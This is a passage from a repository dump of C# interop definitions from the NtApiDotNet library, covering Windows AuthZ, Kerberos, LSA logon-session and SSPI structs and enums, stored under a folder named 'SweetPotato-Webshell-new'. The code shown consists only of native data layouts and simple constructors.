28 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/AUTHZ_ACCESS_REPLY.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct AUTHZ_ACCESS_REPLY
22 | {
23 | public int ResultListLength;
24 | public IntPtr GrantedAccessMask; // PACCESS_MASK.
25 | public IntPtr SaclEvaluationResults; // PDWORD
26 | public IntPtr Error; // PDWORD
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/AUTHZ_ACCESS_REQUEST.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct AUTHZ_ACCESS_REQUEST
22 | {
23 | public AccessMask DesiredAccess;
24 | public IntPtr PrincipalSelfSid;
25 | public IntPtr ObjectTypeList;
26 | public int ObjectTypeListLength;
27 | public IntPtr OptionalArguments;
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/AUTHZ_CONTEXT_INFORMATION_CLASS.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Native
16 | {
17 | internal enum AUTHZ_CONTEXT_INFORMATION_CLASS
18 | {
19 | AuthzContextInfoUserSid = 1,
20 | AuthzContextInfoGroupsSids,
21 | AuthzContextInfoRestrictedSids,
22 | AuthzContextInfoPrivileges,
23 | AuthzContextInfoExpirationTime,
24 | AuthzContextInfoServerContext,
25 | AuthzContextInfoIdentifier,
26 | AuthzContextInfoSource,
27 | AuthzContextInfoAll,
28 | AuthzContextInfoAuthenticationId,
29 | AuthzContextInfoSecurityAttributes,
30 | AuthzContextInfoDeviceSids,
31 | AuthzContextInfoUserClaims,
32 | AuthzContextInfoDeviceClaims,
33 | AuthzContextInfoAppContainerSid,
34 | AuthzContextInfoCapabilitySids
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/AuthZAccessCheckFlags.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Win32.Security.Native
18 | {
19 | [Flags]
20 | internal enum AuthZAccessCheckFlags
21 | {
22 | None = 0,
23 | NoDeepCopySD = 1,
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/CENTRAL_ACCESS_POLICY.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct CENTRAL_ACCESS_POLICY
22 | {
23 | public IntPtr CAPID;
24 | public UnicodeStringOut Name;
25 | public UnicodeStringOut Description;
26 | public UnicodeStringOut ChangeId;
27 | public uint Flags;
28 | public int CAPECount;
29 | public IntPtr CAPEs; // PCENTRAL_ACCESS_POLICY_ENTRY
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/CENTRAL_ACCESS_POLICY_ENTRY.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct CENTRAL_ACCESS_POLICY_ENTRY
22 | {
23 | public UnicodeStringOut Name;
24 | public UnicodeStringOut Description;
25 | public UnicodeStringOut ChangeId;
26 | public int LengthAppliesTo;
27 | public IntPtr AppliesTo;
28 | public int LengthSD;
29 | public IntPtr SD;
30 | public int LengthStagedSD;
31 | public IntPtr StagedSD;
32 | public uint Flags;
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/INHERITED_FROM.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct INHERITED_FROM
22 | {
23 | public int GenerationGap;
24 | public IntPtr AncestorName;
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/KERB_LOGON_SUBMIT_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Native
16 | {
17 | internal enum KERB_LOGON_SUBMIT_TYPE
18 | {
19 | KerbInteractiveLogon = 2,
20 | KerbSmartCardLogon = 6,
21 | KerbWorkstationUnlockLogon = 7,
22 | KerbSmartCardUnlockLogon = 8,
23 | KerbProxyLogon = 9,
24 | KerbTicketLogon = 10,
25 | KerbTicketUnlockLogon = 11,
26 | KerbS4ULogon = 12,
27 | KerbCertificateLogon = 13,
28 | KerbCertificateS4ULogon = 14,
29 | KerbCertificateUnlockLogon = 15,
30 | KerbNoElevationLogon = 83,
31 | KerbLuidLogon = 84,
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/KERB_S4U_LOGON.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
17 | namespace NtApiDotNet.Win32.Security.Native
18 | {
19 | [StructLayout(LayoutKind.Sequential)]
20 | internal struct KERB_S4U_LOGON
21 | {
22 | public KERB_LOGON_SUBMIT_TYPE MessageType;
23 | public int Flags;
24 | public UnicodeStringOut ClientUpn;
25 | public UnicodeStringOut ClientRealm;
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/KERB_TICKET_LOGON.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct KERB_TICKET_LOGON
22 | {
23 | public KERB_LOGON_SUBMIT_TYPE MessageType;
24 | public int Flags;
25 | public int ServiceTicketLength;
26 | public int TicketGrantingTicketLength;
27 | public IntPtr ServiceTicket;
28 | public IntPtr TicketGrantingTicket;
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/LSA_ENUMERATION_INFORMATION.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct LSA_ENUMERATION_INFORMATION
22 | {
23 | public IntPtr Sid;
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/LSA_LAST_INTER_LOGON_INFO.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
17 | namespace NtApiDotNet.Win32.Security.Native
18 | {
19 | [StructLayout(LayoutKind.Sequential)]
20 | internal struct LSA_LAST_INTER_LOGON_INFO
21 | {
22 | public LargeIntegerStruct LastSuccessfulLogon;
23 | public LargeIntegerStruct LastFailedLogon;
24 | public int FailedAttemptCountSinceLastSuccessfulLogon;
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/LsaLogonUserFlags.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Win32.Security.Native
18 | {
19 | #pragma warning disable 1591
20 | ///
21 | /// Logon UserFlags.
22 | ///
23 | [Flags]
24 | public enum LsaLogonUserFlags
25 | {
26 | Guest = 0x01,
27 | NoEncryption = 0x02,
28 | CachedAccount = 0x04,
29 | UsedLmPassword = 0x08,
30 | ExtraSids = 0x20,
31 | SubAuthSessionKey = 0x40,
32 | ServerTrustAccount = 0x80,
33 | NtlmV2Enabled = 0x100,
34 | ResourceGroups = 0x200,
35 | ProfilePathReturned = 0x400,
36 | NtV2 = 0x800,
37 | LmV2 = 0x1000,
38 | NtlmV2 = 0x2000,
39 | Optimized = 0x4000,
40 | WinLogon = 0x8000,
41 | PKInit = 0x10000,
42 | NoOptimized = 0x20000,
43 | NoElevation = 0x40000,
44 | ManagedService = 0x80000,
45 | }
46 | }
47 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/LsaString.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
17 | namespace NtApiDotNet.Win32.Security.Native
18 | {
19 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
20 | internal class LsaString
21 | {
22 | public ushort Length;
23 | public ushort MaximumLength;
24 | [MarshalAs(UnmanagedType.LPStr)]
25 | string Buffer;
26 |
27 | public LsaString(string str)
28 | {
29 | Length = (ushort)str.Length;
30 | MaximumLength = (ushort)(str.Length + 1);
31 | Buffer = str;
32 | }
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/OptionalLuid.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
17 | namespace NtApiDotNet.Win32.Security.Native
18 | {
19 | #pragma warning disable 1591
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal class OptionalLuid
22 | {
23 | public Luid luid;
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/POLICY_AUDIT_SID_ARRAY.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct POLICY_AUDIT_SID_ARRAY
22 | {
23 | public int UsersCount;
24 | public IntPtr UserSidArray;
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/QUOTA_LIMITS.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal class QUOTA_LIMITS
22 | {
23 | public IntPtr PagedPoolLimit;
24 | public IntPtr NonPagedPoolLimit;
25 | public IntPtr MinimumWorkingSetSize;
26 | public IntPtr MaximumWorkingSetSize;
27 | public IntPtr PagefileLimit;
28 | public LargeIntegerStruct TimeLimit;
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SECPKG_ATTR.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Native
16 | {
17 | internal enum SECPKG_ATTR
18 | {
19 | SIZES = 0,
20 | NAMES = 1,
21 | LIFESPAN = 2,
22 | DCE_INFO = 3,
23 | STREAM_SIZES = 4,
24 | KEY_INFO = 5,
25 | AUTHORITY = 6,
26 | PROTO_INFO = 7,
27 | PASSWORD_EXPIRY = 8,
28 | SESSION_KEY = 9,
29 | PACKAGE_INFO = 10,
30 | USER_FLAGS = 11,
31 | NEGOTIATION_INFO = 12,
32 | NATIVE_NAMES = 13,
33 | FLAGS = 14,
34 | USE_VALIDATED = 15,
35 | CREDENTIAL_NAME = 16,
36 | TARGET_INFORMATION = 17,
37 | ACCESS_TOKEN = 18,
38 | TARGET = 19,
39 | AUTHENTICATION_ID = 20,
40 | LOGOFF_TIME = 21,
41 | NEGO_KEYS = 22,
42 | PROMPTING_NEEDED = 24,
43 | UNIQUE_BINDINGS = 25,
44 | ENDPOINT_BINDINGS = 26,
45 | CLIENT_SPECIFIED_TARGET = 27,
46 | LAST_CLIENT_TOKEN_STATUS = 30,
47 | NEGO_PKG_INFO = 31,
48 | NEGO_STATUS = 32,
49 | CONTEXT_DELETED = 33,
50 | DTLS_MTU = 34,
51 | SUBJECT_SECURITY_ATTRIBUTES = 128,
52 | APPLICATION_PROTOCOL = 35,
53 | NEGOTIATED_TLS_EXTENSIONS = 36,
54 | IS_LOOPBACK = 37,
55 | }
56 | }
57 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SECURITY_LOGON_SESSION_DATA.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | [StructLayout(LayoutKind.Sequential)]
21 | internal struct SECURITY_LOGON_SESSION_DATA
22 | {
23 | public int Size;
24 | public Luid LogonId;
25 | public UnicodeStringOut UserName;
26 | public UnicodeStringOut LogonDomain;
27 | public UnicodeStringOut AuthenticationPackage;
28 | public SecurityLogonType LogonType;
29 | public int Session;
30 | public IntPtr Sid;
31 | public LargeIntegerStruct LogonTime;
32 | public UnicodeStringOut LogonServer;
33 | public UnicodeStringOut DnsDomainName;
34 | public UnicodeStringOut Upn;
35 | public LsaLogonUserFlags UserFlags;
36 | public LSA_LAST_INTER_LOGON_INFO LastLogonInfo;
37 | public UnicodeStringOut LogonScript;
38 | public UnicodeStringOut ProfilePath;
39 | public UnicodeStringOut HomeDirectory;
40 | public UnicodeStringOut HomeDirectoryDrive;
41 | public LargeIntegerStruct LogoffTime;
42 | public LargeIntegerStruct KickOffTime;
43 | public LargeIntegerStruct PasswordLastSet;
44 | public LargeIntegerStruct PasswordCanChange;
45 | public LargeIntegerStruct PasswordMustChange;
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SEC_CHANNEL_BINDING.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
17 | namespace NtApiDotNet.Win32.Security.Native
18 | {
19 | [StructLayout(LayoutKind.Sequential)]
20 | internal struct SEC_CHANNEL_BINDINGS
21 | {
22 | public int dwInitiatorAddrType;
23 | public int cbInitiatorLength;
24 | public int dwInitiatorOffset;
25 | public int dwAcceptorAddrType;
26 | public int cbAcceptorLength;
27 | public int dwAcceptorOffset;
28 | public int cbApplicationDataLength;
29 | public int dwApplicationDataOffset;
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SEC_WINNT_AUTH_IDENTITY.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 | using System.Security;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | #pragma warning disable 1591
21 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
22 | internal class SEC_WINNT_AUTH_IDENTITY
23 | {
24 | [MarshalAs(UnmanagedType.LPWStr)]
25 | public string User;
26 | public int UserLength;
27 | [MarshalAs(UnmanagedType.LPWStr)]
28 | public string Domain;
29 | public int DomainLength;
30 | public SecureStringMarshal Password;
31 | public int PasswordLength;
32 | public SecWinNtAuthIdentityFlags Flags;
33 |
34 | public SEC_WINNT_AUTH_IDENTITY()
35 | {
36 | }
37 |
38 | public SEC_WINNT_AUTH_IDENTITY(string user, string domain, SecureString password, DisposableList list)
39 | {
40 | User = user;
41 | UserLength = user?.Length ?? 0;
42 | Domain = domain;
43 | DomainLength = domain?.Length ?? 0;
44 | if (password != null)
45 | {
46 | Password = list.AddResource(new SecureStringMarshal(password));
47 | PasswordLength = password.Length;
48 | }
49 | Flags = SecWinNtAuthIdentityFlags.Unicode;
50 | }
51 | }
52 | }
53 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecBufferType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Native
16 | {
17 | #pragma warning disable 1591
18 | ///
19 | /// Security buffer type.
20 | ///
21 | internal enum SecBufferType
22 | {
23 | Empty = 0,
24 | Data = 1,
25 | Token = 2,
26 | PkgParams = 3,
27 | Missing = 4,
28 | Extra = 5,
29 | StreamTrailer = 6,
30 | StreamHeader = 7,
31 | NegotiationInfo = 8,
32 | Padding = 9,
33 | Stream = 10,
34 | Mechlist = 11,
35 | MechlistSignature = 12,
36 | Target = 13,
37 | ChannelBindings = 14,
38 | ChangePassResponse = 15,
39 | TargetHost = 16,
40 | Alert = 17,
41 | ApplicationProtocols = 18,
42 | SRTPProtectionProfiles = 19,
43 | SRTPMasterKeyIdentifier = 20,
44 | TokenBinding = 21,
45 | PresharedKey = 22,
46 | PresharedKeyIdentity = 23,
47 | DTLAMtu = 24,
48 | }
49 | }
50 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
20 | #pragma warning disable 1591
21 | [StructLayout(LayoutKind.Sequential)]
22 | internal class SecHandle
23 | {
24 | public IntPtr dwLower;
25 | public IntPtr dwUpper;
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecPkgContextStructs.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
